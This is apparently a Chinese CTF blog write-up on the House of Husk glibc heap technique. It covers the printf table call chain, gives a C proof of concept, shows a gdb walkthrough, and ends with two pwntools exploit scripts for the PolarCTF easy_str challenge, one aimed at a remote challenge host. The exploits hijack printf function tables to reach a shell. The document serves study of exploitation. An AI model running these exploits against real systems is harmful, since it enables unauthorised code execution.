House Of Husk 搭配格式化字符串的堆利用全新理解

First Post:

Last Update:

Word Count:
2.8k

Read Time:
13 min

Page View: loading...

House Of Husk

前言:在打PolarCTF2023 冬季个人挑战赛时遇到一个堆题,题目叫做easy_str,一开始以为是个格式化字符串题目,但实际上是个堆题,题目也很特殊,只能申请大小大于0x500的chunk,特此赛后复盘学习一下该题目,以及这个题目所用到的技巧

攻击原理

这种攻击方式主要是利用了printf的一个调用链,应用场景是只能分配较大chunk时(超过fastbin),存在或可以构造出UAF漏洞。

首先从源码角度简单分析攻击背后的原理。在使用printf类格式化字符串函数进行输出的时候,该类函数会根据我们格式化字符串的种类不同而采取不同的输出格式进行输出,在glibc中有这样一个函数__register_printf_function,为格式化字符为spec的格式化输出注册函数,这个函数是__register_printf_specifier函数的封装。

跟进__register_printf_specifier函数,如果格式化符超过0xff或小于0,即不在单字节字符范围内,则设置errno为EINVAL并返回-1;如果__printf_function_table为空,就通过calloc分配一块堆内存,同时存放__printf_arginfo_table以及__printf_function_table。两个表各有0x100个表项(每项是一个指针),可以为0-0xff的每个字符注册一个函数指针,第一个表(arginfo)后面紧接着第二个表(function)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/* Register FUNC to be called to format SPEC specifiers.
   Thin wrapper: SPEC and CONVERTER are forwarded unchanged to
   __register_printf_specifier, and ARGINFO is passed on after a cast to
   printf_arginfo_size_function *.  The result of that call is returned
   as-is.  */
int
__register_printf_function (int spec, printf_function converter,
printf_arginfo_function arginfo)
{
return __register_printf_specifier (spec, converter,
(printf_arginfo_size_function*) arginfo);
}
/* Register FUNC to be called to format SPEC specifiers.
   Stores CONVERTER in __printf_function_table[SPEC] and ARGINFO in
   __printf_arginfo_table[SPEC], allocating both tables on first use.
   Returns 0 on success.  Returns -1 with errno set to EINVAL when SPEC is
   outside [0, UCHAR_MAX], and -1 when the table allocation fails.  */
int
__register_printf_specifier (int spec, printf_function converter,
printf_arginfo_size_function arginfo)
{
/* Only values in [0, UCHAR_MAX] have a slot in the tables.  */
if (spec < 0 || spec > (int) UCHAR_MAX)
{
__set_errno (EINVAL);
return -1;
}

int result = 0;
__libc_lock_lock (lock);

/* First registration: both tables come from a single zeroed calloc
   block of (UCHAR_MAX + 1) * 2 pointer-sized slots.  */
if (__printf_function_table == NULL)
{
__printf_arginfo_table = (printf_arginfo_size_function **)
calloc (UCHAR_MAX + 1,sizeof (void *) * 2);
if (__printf_arginfo_table == NULL)
{
result = -1;
goto out;
}

/* The function table is the second half of that block, starting
   UCHAR_MAX + 1 entries after the arginfo table.  */
__printf_function_table = (printf_function **)
(__printf_arginfo_table + UCHAR_MAX + 1);
}

__printf_function_table[spec] = converter;
__printf_arginfo_table[spec] = arginfo;

/* Common exit: the lock is released on both success and failure.  */
out:
__libc_lock_unlock (lock);

return result;
}

__printf_function_table中spec索引处、类型为printf_function的函数指针,就是我们为chr(spec)这个格式化字符注册的输出函数,这个函数在printf->vfprintf->printf_positional中被调用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/* Type of a printf specifier-handler function.
   STREAM is the FILE on which to write output.
   INFO gives information about the format specification.
   ARGS is a vector of pointers to the argument data;
   the number of pointers will be the number returned
   by the associated arginfo function for the same INFO.
   The function should return the number of characters written,
   or -1 for errors.  */
typedef int printf_function (FILE *__stream,
                             const struct printf_info *__info,
                             const void *const *__args);

//glibc-2.27/vfprintf.c:1985
extern printf_function **__printf_function_table;
int function_done;

if (spec <= UCHAR_MAX
&& __printf_function_table != NULL
&& __printf_function_table[(size_t) spec] != NULL)
{
const void **ptr = alloca (specs[nspecs_done].ndata_args
*sizeof (const void *));

/* Fill in an array of pointers to the argument values. */
for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;
++i)
ptr[i] = &args_value[specs[nspecs_done].data_arg + i];

/* Call the function. */
function_done = __printf_function_table[(size_t) spec]
(s, &specs[nspecs_done].info, ptr);

if (function_done != -2)
{
/* If an error occurred we don't have information
about # of chars. */
if (function_done < 0)
{
/* Function has set errno. */
done = -1;
goto all_done;
}

done_add (function_done);
break;
}
}

__printf_arginfo_table中spec索引处、类型为printf_arginfo_size_function的函数指针,是我们为chr(spec)这个格式化字符注册的另一个函数指针,这个函数在printf->vfprintf->printf_positional->__parse_one_specmb中被调用。可以看到其返回值为格式化字符消耗的参数个数,猜测其功能是根据格式化字符做解析。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/* Type of a printf specifier-arginfo function.
   INFO gives information about the format specification.
   N, ARGTYPES, *SIZE has to contain the size of the parameter for
   user-defined types, and return value are as for parse_printf_format
   except that -1 should be returned if the handler cannot handle
   this case.  This allows to partially overwrite the functionality
   of existing format specifiers.  */
typedef int printf_arginfo_size_function (const struct printf_info *__info,
                                          size_t __n, int *__argtypes,
                                          int *__size);

//glibc-2.27/printf-parsemb.c:307

/* Get the format specification. */
spec->info.spec = (wchar_t) *format++;
spec->size = -1;
if (__builtin_expect (__printf_function_table == NULL, 1)
|| spec->info.spec > UCHAR_MAX
|| __printf_arginfo_table[spec->info.spec] == NULL
/* We don't try to get the types for all arguments if the format
uses more than one. The normal case is covered though. If
the call returns -1 we continue with the normal specifiers. */
|| (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
(&spec->info, 1, &spec->data_arg_type,
&spec->size)) < 0)
{
/* Find the data argument types of a built-in spec. */
spec->ndata_args = 1;

structprintf_spec
{
/* Information parsed from the format spec. */
structprintf_infoinfo;
/* Pointers into the format string for the end of this format
spec and the next (or to the end of the string if no more). */
const UCHAR_T *end_of_fmt, *next_fmt;
/* Position of arguments for precision and width, or -1 if `info' has
the constant value. */
int prec_arg, width_arg;
int data_arg; /* Position of data argument. */
int data_arg_type; /* Type of first argument. */
/* Number of arguments consumed by this format specifier. */
size_t ndata_args;
/* Size of the parameter for PA_USER type. */
int size;
};

此外,在vfprintf函数中如果检测到我们注册的table不为空,则对于格式化字符不走默认的输出函数而是调用printf_positional函数,进而可以调用到表中的函数指针。

至此,两个调用链的分析就完成了,我们再来结合poc分析一下今天要谈论的攻击方式是如何和printf结合的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//glibc-2.27/vfprintf.c:1335
/* Use the slow path in case any printf handler is registered. */
if (__glibc_unlikely (__printf_function_table != NULL
|| __printf_modifier_table != NULL
|| __printf_va_arg_table != NULL))
goto do_positional;

/* Hand off processing for positional parameters. */

do_positional:
if (__glibc_unlikely (workstart != NULL))
{
free (workstart);
workstart = NULL;
}
done = printf_positional (s, format, readonly_format, ap, &ap_save,
done, nspecs_done, lead_str_end, work_buffer,
save_errno, grouping, thousands_sep);

poc分析

这里使用的poc就直接用攻击发现者提供的源代码,运行环境为ubuntu 18.04/glibc 2.27,编译命令为gcc ./poc.c -g -fPIE -no-pie -o poc(关闭pie方便调试)。

代码模拟了UAF漏洞,先分配一个超过fastbin的块,释放之后会进入unsorted bin。预先分配两个chunk,第一个用来伪造__printf_function_table,第二个用来伪造__printf_arginfo_table。将__printf_arginfo_table['X']处的函数指针改为one_gadget

使用unsorted bin attack将global_max_fast改写为main_arena+88(该偏移对应glibc 2.23;在本文poc所用的glibc 2.27中为main_arena+0x60,即poc中的MAIN_ARENA_DELTA),从而使得释放的所有块都按fastbin处理(都是超过large bin大小的堆块不会进tcache)。

在这里有一个很重要的知识就是fastbin的堆块地址会存放在main_arena中,从main_arena+8开始存放fastbin[0x20]的头指针,一直往后推,由于平时的fastbin默认阈值为0x80,所以在glibc-2.23的环境下最多存放到main_arena+0x48,现在我们将阈值改为一个0x7f开头的libc地址(一个极大的值),导致几乎所有sz的chunk都被当做fastbin,其地址会从main_arena+8开始,根据sz不同往libc覆写堆地址。如此一来,只要我们计算好__printf_arginfo_table和main_arena的地址偏移,进而得到合适的sz,就可以在之后释放这个伪造table的chunk时把__printf_arginfo_table覆写为heap_addr。这种利用方式在*CTF2019->heap_master的题解中我曾经使用过,详情可以参见Star CTF heap_master的1.2.4.3

有了上述知识铺垫,整个攻击流程就比较清晰了,总结一下,先UAF改global_max_fast为main_arena+88,之后释放合适sz的块到fastbin,从而覆写__printf_arginfo_table表为heap地址,heap['X']被覆写为了one_gadget,在调用这个函数指针时即可get shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/**
 * This is a Proof-of-Concept for House of Husk
 * This PoC is supposed to be run with libc-2.27.
 *
 * Every constant below is an offset that the code adds to (or subtracts
 * from) the libc base, so the values are only valid for the exact libc
 * build they were taken from.
 */
#include <stdio.h>
#include <stdlib.h>

/* Request size whose freed chunk lands OFS bytes past main_arena once
   every size is handled as a fastbin. */
#define offset2size(ofs) ((ofs) * 2 - 0x10)
#define MAIN_ARENA 0x3ebc40
#define MAIN_ARENA_DELTA 0x60
#define GLOBAL_MAX_FAST 0x3ed940
#define PRINTF_FUNCTABLE 0x3f0658
#define PRINTF_ARGINFO 0x3ec870
#define ONE_GADGET 0x10a38c

int main (void)
{
  unsigned long libc_base;
  char *a[10];
  setbuf(stdout, NULL); // make printf quiet

  /* leak libc */
  a[0] = malloc(0x500); /* UAF chunk */
  a[1] = malloc(offset2size(PRINTF_FUNCTABLE - MAIN_ARENA));
  a[2] = malloc(offset2size(PRINTF_ARGINFO - MAIN_ARENA));
  a[3] = malloc(0x500); /* avoid consolidation */
  free(a[0]);
  /* Simulated UAF read: the freed chunk's first word is a libc pointer. */
  libc_base = *(unsigned long*)a[0] - MAIN_ARENA - MAIN_ARENA_DELTA;
  printf("libc @ 0x%lx\n", libc_base);

  /* prepare fake printf arginfo table */
  /* The index is 'X' - 2 because the user data starts 0x10 bytes (two
     pointer slots) after the chunk address that gets written to libc. */
  *(unsigned long*)(a[2] + ('X' - 2) * 8) = libc_base + ONE_GADGET;
  //*(unsigned long*)(a[1] + ('X' - 2) * 8) = libc_base + ONE_GADGET;
  //now __printf_arginfo_table['X'] = one_gadget;

  /* unsorted bin attack */
  *(unsigned long*)(a[0] + 8) = libc_base + GLOBAL_MAX_FAST - 0x10;
  a[0] = malloc(0x500); /* overwrite global_max_fast */

  /* overwrite __printf_arginfo_table and __printf_function_table */
  free(a[1]); // __printf_function_table => a heap_addr which is not NULL
  free(a[2]); // __printf_arginfo_table => heap chunk whose ['X'] slot is one_gadget

  /* ignite! */
  printf("%X", 0);

  return 0;
}

动态分析

glibc的调试我们用的比较多了,在涉及到库函数的时候最好结合源码进行调试,在glibc下载这里下载源码,解压之后使用directory添加源码目录

1
2
3
4
b* 0x400774
directory ~/Desktop/CTF/glibc-2.27/stdio-common
r
parseheap

在printf下断点,可以看到此时__printf_arginfo_table伪造完成,我们使用rwatch *0x60be50下内存断点,继续运行。

image.png

使用si单步进入printf

image.png

下一个调用函数

image-20231210185336964

下一步调用

image.png

可以看到运行到了__parse_one_specmb函数,再跟进两步,发现最终调用了rax寄存器里的 one_gadget

image.png

image.png

扩展

当然,除了覆写第二个table外,改第一个一样可以get shell,流程和调试我们已经讲的差不多了,这里只需把one_gadget赋值代码改为*(unsigned long*)(a[1] + ('X' - 2) * 8) = libc_base + ONE_GADGET;即可,我们用同样方式在gdb下调试poc并设置硬件断点

continue继续,可以看到在printf_positional断住,跟进两步,最终调用了rax里的one_gadget

例题: PolarCTF2023 冬季个人挑战赛 easy_str

查看题目信息

1
$ file easy_str
$ checksec easy_str

利用 unsorted bin attack 将 global_max_fast 改为 main_arena->top,后面释放的 chunk 会进入 fastbinY 数组。通过 fastbinY 越界利用将 __printf_arginfo_table 对应的 spec 改为 one_gadget。最后通过调用 printf("%X",0) 来触发 one_gadget

1
2
3
4
5
6
def get_shell():
    """Second stage of the walkthrough: edit chunks 0 and 2, allocate, then free 2 and 1."""
    # Both 8-byte words at the start of chunk 0 get the same value
    # (libc_addr + 0x3ed940 - 0x10).
    edit(0, p64(libc_addr+0x3ed940-0x10)*2)
    # 0x58 is ord('X'); slot (0x58 - 2) of chunk 2 receives the gadget address.
    edit(2, b'a'*((0x58-2)*8) + p64(libc_addr+0x10a2fc))
    add(0x500) # 4
    dele(2)
    dele(1)
EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#pwn()

#远程
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context.binary = './easy_str.easy_str'
context.log_level = 'debug'

# io = remote('120.46.59.242', 2131)
io = process('./easy_str.easy_str')
elf = ELF('./easy_str.easy_str')
libc = ELF('./libc-2.27.so')
one_gadgets = [0x4f2a5, 0x4f302, 0x10a2fc]

def debug(gdbscript="", stop=False):
    """Attach gdb to the target when it is a local process.

    gdbscript is handed to gdb.attach; when stop is true, pause() is called
    after attaching.
    """
    # NOTE(review): the nesting of `if stop` was lost with the indentation;
    # it is placed inside the process check here -- confirm.
    if isinstance(io, process):
        gdb.attach(io, gdbscript=gdbscript)
        if stop:
            pause()

# Short module-level aliases for pause(), a logging helper, and the
# send/receive methods of the `io` tube, so the functions below stay terse.
stop = pause
S = pause
# leak(name, address): log "name ===> 0x..." at info level.
leak = lambda name, address: log.info("{} ===> {}".format(name, hex(address)))
s = io.send
sl = io.sendline
sla = io.sendlineafter
sa = io.sendafter
slt = io.sendlinethen
st = io.sendthen
r = io.recv
rn = io.recvn
rr = io.recvregex
ru = io.recvuntil
ra = io.recvall
rl = io.recvline
rs = io.recvlines
rls = io.recvline_startswith
rle = io.recvline_endswith
rlc = io.recvline_contains
ia = io.interactive
ic = io.close
cr = io.can_recv

def cmd(i):
    """Send menu choice `i` (bytes) once the 'choice: ' prompt line has arrived."""
    sla(b'choice: \n', i)

def add(size):
    """Menu option 1: send `size` as a decimal string at the size prompt."""
    cmd(b'1')
    sla(b'size:\n', str(size).encode())

def edit(idx, content):
    """Menu option 2: select entry `idx`, then send `content` followed by a newline."""
    cmd(b'2')
    sla(b'id:\n', str(idx).encode())
    sl(content)

def show(idx):
    """Menu option 3: select entry `idx` and consume output up to the 'output' line."""
    cmd(b'3')
    sla(b'id:\n', str(idx).encode())
    # Leaves the tube positioned at the start of the printed data.
    ru(b'output\n')

def dele(idx):
    """Menu option 4: select entry `idx`."""
    cmd(b'4')
    sla(b'id:\n', str(idx).encode())

def get_libc():
    """Create four entries, release entry 0, and derive libc_addr from what show(0) prints.

    Sets the module-level global `libc_addr`.
    """
    global libc_addr
    add(0x500) # 0
    add(0x4af8*2-0x10) # 1
    add(0xC30*2-0x10) # 2
    add(0x500) # 3

    dele(0)
    show(0)

    # Six bytes are read and zero-padded to eight before unpacking.
    # 0x3ebca0 is presumably the leaked pointer's offset from the libc
    # base -- confirm against the libc in use.
    libc_addr = u64(r(6).ljust(0x8, b'\x00'))-0x3ebca0
    leak("libc_addr", libc_addr)
    leak("onegadget", libc_addr+0x10a2fc)

def get_shell():
    """Second stage: edit entries 0 and 2, allocate once more, then release 2 and 1."""
    edit(0, p64(libc_addr+0x3ed940-0x10)*2)
    # 0x58 is ord('X'). Author's note: targeting entry 2 or entry 1 both work.
    edit(2, b'a'*((0x58-2)*8) + p64(libc_addr+0x10a2fc))
    add(0x500) # 4
    dele(2)
    dele(1)

def pwn():
    """Run both stages in order, then hand the tube over to the user."""
    get_libc()
    get_shell()
    ia()

# Only run when executed as a script, not when imported.
if __name__ == '__main__':
    pwn()

打本地,我的libc版本是2.27-3ubuntu1_amd64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level = "debug",arch = "amd64")
file_name='./easy_str.easy_str'
ld_name='/mnt/e/CTF/PWN/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so'
# libc_name='/mnt/e/CTF/PWN/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6'
libc_name = './libc-2.27.so'

def connect():
    """Open the tube and load the ELF objects into the globals p, elf and libc."""
    global p,elf,libc
    # NOTE(review): local is 0, so the remote branch is taken even though
    # the surrounding text describes a local run -- confirm.
    local = 0
    if local:
        # p = process([ld_name, file_name], env={"LD_PRELOAD":libc_name})
        p = process(file_name)
    else:
        p = remote("120.46.59.242",2131 )
    elf = ELF(file_name)
    # libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    libc = ELF("/mnt/e/CTF/PWN/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so")
    # libc = ELF(libc_name)

# Thin wrappers around the global tube `p`. Unlike direct aliases, they
# look `p` up at call time, so they can be defined before connect() runs.
s = lambda data :p.send(data)
sl = lambda data :p.sendline(data)
sa = lambda x,data :p.sendafter(x, data)
sla = lambda x,data :p.sendlineafter(x, data)
# NOTE(review): n is passed as recvline's first positional argument, which
# looks like the keepends flag rather than a byte count -- confirm.
rl = lambda n :p.recvline(n)
ru = lambda x :p.recvuntil(x, drop = True)
# `r` was defined twice with the same body; only the later binding is kept.
r = lambda x :p.recv(x)
# Read up to a 0x7f byte and unpack the last six bytes as a 64-bit value.
uu64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
itr = lambda :p.interactive()
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))

def dbg(addr):
    """Attach gdb to the tube with a breakpoint at hex address `addr`, then continue.

    `addr` is interpolated after '0x', so it is given as hex digits without a prefix.
    """
    # The original referenced an undefined name `sh`; the tube in this
    # script is the global `p`.
    gdb.attach(p,'b *0x{}\nc\n'.format(addr))

def db():
    """Attach gdb to the tube with no extra script."""
    gdb.attach(p)

def meau(idx):
    """Wait for the 'choice: ' prompt line, then send menu option `idx`."""
    ru("choice: \n")
    sl(str(idx))

def edit(idx,content):
    """Menu option 2: select entry `idx`, then send `content` with no trailing newline."""
    meau(2)
    sla("id:\n",str(idx))
    s(content)

def add(size):
    """Menu option 1: send `size` as a decimal string at the size prompt."""
    meau(1)
    sla("size:\n",str(size))

def show(idx):
    """Menu option 3: select entry `idx`; the caller reads the output."""
    meau(3)
    sla("id:",str(idx))

def delete(idx):
    """Menu option 4: select entry `idx`."""
    meau(4)
    sla("id:",str(idx))

# Same formula as the C PoC macro; pwn() inlines it as (X - MAIN_ARENA)*2 - 0x10:
#define offset2size(ofs) ((ofs) * 2 - 0x10)
# Offsets used by pwn(): added to libc_base, or subtracted from the leaked pointer.
MAIN_ARENA = 0x3ebc40
MAIN_ARENA_DELTA = 0x60
GLOBAL_MAX_FAST = 0x3ed940
PRINTF_FUNCTABLE = 0x3f0658
PRINTF_ARGINFO = 0x3ec870
ONE_GADGET = 0x10a38c

def pwn():
    """Full sequence for this script: four allocations, leak, two edits, one allocation, two frees.

    Uses the global tube `p`, which connect() assigns.
    """
    # NOTE(review): nothing in the visible listing calls connect() or pwn();
    # confirm the script's entry point. Whether the trailing
    # p.interactive() belongs to this function was lost with the indentation.
    add(0x500) #0
    add((PRINTF_FUNCTABLE-MAIN_ARENA)*2-0x10) #1
    add((PRINTF_ARGINFO-MAIN_ARENA)*2-0x10) #2
    add(0x500) #3

    delete(0)
    show(0)
    ru("output\n")

    # Six bytes are read and zero-padded to eight before unpacking.
    libc_base = u64(p.recv(6).ljust(8,b'\x00')) - MAIN_ARENA - MAIN_ARENA_DELTA
    lg("libc_base",libc_base)

    # 86 == ord('X') - 2, the same slot the C PoC writes.
    pay0 = p64(0)*86 + p64(libc_base+ONE_GADGET)
    edit(2,pay0)

    # Modify global_max_fast.
    pay1 = p64(0) + p64(libc_base + GLOBAL_MAX_FAST-0x10)
    edit(0,pay1)
    add(0x500) #0

    delete(2)
    delete(1)

    # meau(666)
    # db()
    p.interactive()